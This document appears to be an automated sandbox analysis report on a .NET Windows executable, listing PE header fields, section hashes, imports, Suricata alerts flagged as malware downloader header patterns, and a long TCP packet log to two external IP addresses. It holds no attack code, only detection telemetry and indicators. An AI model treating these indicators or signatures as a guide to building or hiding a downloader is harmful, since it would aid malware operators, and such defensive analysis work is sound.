OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf5ccb	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf6000	0x5c4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xf447c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xf3d24	0xf3e00	63903134d32b8b43a218e141f2b7a993	False	0.6938038585981547	data	6.942209019187486	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf6000	0x5c4	0x600	6dfd60677fb0d735248e421c21c6e32f	False	0.4296875	data	4.131983215641117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf8000	0xc	0x200	843c8b8d48b4541253fc633dd605f6b6	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xf6090	0x334	data			0.4402439024390244
RT_MANIFEST	0xf63d4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T14:07:33.780912+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49717	132.226.247.73	80	TCP
2024-12-10T14:07:36.296445+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49717	132.226.247.73	80	TCP
2024-12-10T14:07:37.656640+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49720	132.226.247.73	80	TCP
2024-12-10T14:07:37.770864+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49721	172.67.177.134	443	TCP
2024-12-10T14:07:39.327680+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49724	132.226.247.73	80	TCP
2024-12-10T14:07:39.843321+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49720	132.226.247.73	80	TCP
2024-12-10T14:07:41.466474+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49726	172.67.177.134	443	TCP
2024-12-10T14:07:42.952722+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49730	132.226.247.73	80	TCP
2024-12-10T14:07:47.685667+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49739	172.67.177.134	443	TCP
2024-12-10T14:07:50.782182+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49745	172.67.177.134	443	TCP
2024-12-10T14:07:53.875936+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49749	172.67.177.134	443	TCP
2024-12-10T14:07:57.009310+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49754	172.67.177.134	443	TCP
2024-12-10T14:08:03.215951+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49761	172.67.177.134	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 14:07:31.835921049 CET	49717	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:31.955801010 CET	80	49717	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:31.955887079 CET	49717	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:31.956165075 CET	49717	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:32.075412989 CET	80	49717	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:33.259552002 CET	80	49717	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:33.265702963 CET	49717	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:33.388014078 CET	80	49717	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:33.692115068 CET	80	49717	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:33.780911922 CET	49717	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:33.901129961 CET	49718	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:33.901169062 CET	443	49718	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:33.901398897 CET	49718	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:33.908190966 CET	49718	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:33.908209085 CET	443	49718	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:35.135613918 CET	443	49718	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:35.135683060 CET	49718	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:35.141688108 CET	49718	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:35.141710043 CET	443	49718	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:35.142023087 CET	443	49718	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:35.204035044 CET	49718	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:35.247345924 CET	443	49718	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:35.632540941 CET	443	49718	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:35.632613897 CET	443	49718	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:35.632707119 CET	49718	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:35.659810066 CET	49718	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:35.663484097 CET	49717	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:35.747754097 CET	49720	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:35.782973051 CET	80	49717	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:35.867532015 CET	80	49720	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:35.870898962 CET	49720	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:35.913079977 CET	49720	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:36.032481909 CET	80	49720	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:36.091520071 CET	80	49717	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:36.108350039 CET	49721	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:36.108407974 CET	443	49721	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:36.108536005 CET	49721	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:36.108810902 CET	49721	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:36.108825922 CET	443	49721	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:36.296444893 CET	49717	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:37.175632000 CET	80	49720	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:37.180768013 CET	49720	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:37.300415993 CET	80	49720	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:37.323601007 CET	443	49721	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:37.330210924 CET	49721	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:37.330243111 CET	443	49721	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:37.604464054 CET	80	49720	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:37.640789032 CET	49723	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:37.640842915 CET	443	49723	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:37.641370058 CET	49723	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:37.645436049 CET	49723	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:37.645466089 CET	443	49723	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:37.656640053 CET	49720	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:37.770885944 CET	443	49721	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:37.770946980 CET	443	49721	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:37.771090984 CET	49721	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:37.771586895 CET	49721	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:37.775420904 CET	49717	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:37.776072979 CET	49724	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:37.895267963 CET	80	49717	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:37.895421028 CET	80	49724	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:37.895422935 CET	49717	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:37.895636082 CET	49724	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:37.895793915 CET	49724	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:38.017317057 CET	80	49724	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:38.874387026 CET	443	49723	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:38.874491930 CET	49723	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:38.883347034 CET	49723	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:38.883368969 CET	443	49723	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:38.883667946 CET	443	49723	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:38.937045097 CET	49723	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:38.997777939 CET	49723	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:39.043334007 CET	443	49723	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:39.284348965 CET	80	49724	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:39.285706997 CET	49725	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:39.285753965 CET	443	49725	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:39.285823107 CET	49725	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:39.286113977 CET	49725	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:39.286128998 CET	443	49725	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:39.327680111 CET	49724	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:39.370044947 CET	443	49723	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:39.370110989 CET	443	49723	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:39.370268106 CET	49723	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:39.372659922 CET	49723	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:39.376823902 CET	49720	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:39.496170998 CET	80	49720	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:39.801083088 CET	80	49720	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:39.803802967 CET	49726	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:39.803843021 CET	443	49726	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:39.803922892 CET	49726	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:39.804230928 CET	49726	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:39.804249048 CET	443	49726	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:39.843321085 CET	49720	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:40.503048897 CET	443	49725	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:40.505034924 CET	49725	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:40.505054951 CET	443	49725	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:40.951704025 CET	443	49725	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:40.951782942 CET	443	49725	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:40.951884985 CET	49725	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:40.952204943 CET	49725	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:40.958345890 CET	49728	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:41.018961906 CET	443	49726	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:41.027677059 CET	49726	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:41.027697086 CET	443	49726	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:41.077707052 CET	80	49728	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:41.077920914 CET	49728	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:41.078166962 CET	49728	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:41.197810888 CET	80	49728	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:41.466486931 CET	443	49726	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:41.466563940 CET	443	49726	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:41.466613054 CET	49726	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:41.467024088 CET	49726	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:41.471306086 CET	49720	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:41.472332001 CET	49730	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:41.592204094 CET	80	49720	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:41.592343092 CET	49720	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:41.592787981 CET	80	49730	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:41.593368053 CET	49730	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:41.593873978 CET	49730	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:41.713251114 CET	80	49730	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:42.431595087 CET	80	49728	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:42.432992935 CET	49732	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:42.433048964 CET	443	49732	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:42.433109045 CET	49732	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:42.433379889 CET	49732	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:42.433398008 CET	443	49732	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:42.472629070 CET	49728	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:42.897459984 CET	80	49730	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:42.899015903 CET	49733	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:42.899055958 CET	443	49733	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:42.899127007 CET	49733	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:42.899457932 CET	49733	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:42.899472952 CET	443	49733	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:42.952722073 CET	49730	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:43.644730091 CET	443	49732	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:43.646435022 CET	49732	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:43.646472931 CET	443	49732	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:44.096770048 CET	443	49732	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:44.096834898 CET	443	49732	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:44.096904993 CET	49732	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:44.097410917 CET	49732	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:44.100735903 CET	49728	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:44.101758957 CET	49735	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:44.108371973 CET	443	49733	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:44.111227036 CET	49733	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:44.111248970 CET	443	49733	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:44.220324039 CET	80	49728	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:44.220428944 CET	49728	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:44.221060991 CET	80	49735	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:44.221154928 CET	49735	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:44.221330881 CET	49735	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:44.340538979 CET	80	49735	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:44.568075895 CET	443	49733	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:44.568166018 CET	443	49733	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:44.568442106 CET	49733	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:44.568985939 CET	49733	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:44.575535059 CET	49736	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:44.694919109 CET	80	49736	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:44.694996119 CET	49736	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:44.695183039 CET	49736	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:44.814558983 CET	80	49736	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:45.549906015 CET	80	49735	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:45.551403046 CET	49737	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:45.551440954 CET	443	49737	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:45.551594973 CET	49737	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:45.551876068 CET	49737	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:45.551889896 CET	443	49737	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:45.593348980 CET	49735	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:46.023703098 CET	80	49736	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:46.025084972 CET	49739	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:46.025132895 CET	443	49739	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:46.025415897 CET	49739	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:46.026295900 CET	49739	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:46.026312113 CET	443	49739	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:46.077701092 CET	49736	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:46.762419939 CET	443	49737	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:46.774533033 CET	49737	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:46.774559975 CET	443	49737	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:47.226903915 CET	443	49737	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:47.226982117 CET	443	49737	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:47.227159977 CET	49737	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:47.227478981 CET	49737	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:47.231004953 CET	49735	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.232259035 CET	49740	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.238671064 CET	443	49739	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:47.256665945 CET	49739	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:47.256684065 CET	443	49739	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:47.350675106 CET	80	49735	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:47.350754023 CET	49735	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.351591110 CET	80	49740	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:47.352641106 CET	49740	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.352802038 CET	49740	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.472323895 CET	80	49740	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:47.685698986 CET	443	49739	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:47.685774088 CET	443	49739	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:47.685831070 CET	49739	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:47.686317921 CET	49739	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:47.690114975 CET	49736	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.691328049 CET	49741	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.809935093 CET	80	49736	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:47.810000896 CET	49736	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.810632944 CET	80	49741	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:47.810704947 CET	49741	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.810920954 CET	49741	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:47.930550098 CET	80	49741	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:48.657181978 CET	80	49740	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:48.658581972 CET	49744	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:48.658626080 CET	443	49744	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:48.658979893 CET	49744	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:48.658979893 CET	49744	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:48.659018993 CET	443	49744	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:48.702931881 CET	49740	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:49.114424944 CET	80	49741	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:49.118318081 CET	49745	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:49.118376017 CET	443	49745	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:49.118455887 CET	49745	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:49.118956089 CET	49745	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:49.118968964 CET	443	49745	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:49.155836105 CET	49741	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:49.872982025 CET	443	49744	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:49.885032892 CET	49744	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:49.885066032 CET	443	49744	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:50.318335056 CET	443	49744	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:50.318406105 CET	443	49744	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:50.318475962 CET	49744	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:50.319067955 CET	49744	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:50.322731972 CET	49740	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:50.323987007 CET	49746	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:50.330750942 CET	443	49745	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:50.340682983 CET	49745	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:50.340711117 CET	443	49745	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:50.442312956 CET	80	49740	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:50.442405939 CET	49740	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:50.443361998 CET	80	49746	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:50.443464041 CET	49746	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:50.443588972 CET	49746	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:50.562815905 CET	80	49746	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:50.782185078 CET	443	49745	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:50.782265902 CET	443	49745	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:50.782309055 CET	49745	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:50.782825947 CET	49745	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:50.786180973 CET	49741	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:50.787405968 CET	49747	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:50.907402992 CET	80	49741	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:50.907466888 CET	80	49747	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:50.907511950 CET	49741	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:50.907583952 CET	49747	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:50.907795906 CET	49747	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:51.028203964 CET	80	49747	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:51.751549006 CET	80	49746	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:51.752907991 CET	49748	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:51.752945900 CET	443	49748	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:51.753031969 CET	49748	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:51.753330946 CET	49748	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:51.753348112 CET	443	49748	172.67.177.134	192.168.2.6
Dec 10, 2024 14:07:51.796555996 CET	49746	80	192.168.2.6	132.226.247.73
Dec 10, 2024 14:07:52.212213993 CET	80	49747	132.226.247.73	192.168.2.6
Dec 10, 2024 14:07:52.217997074 CET	49749	443	192.168.2.6	172.67.177.134
Dec 10, 2024 14:07:52.218034983 CET	443	49749	172.67.177.134	192.168.2.6
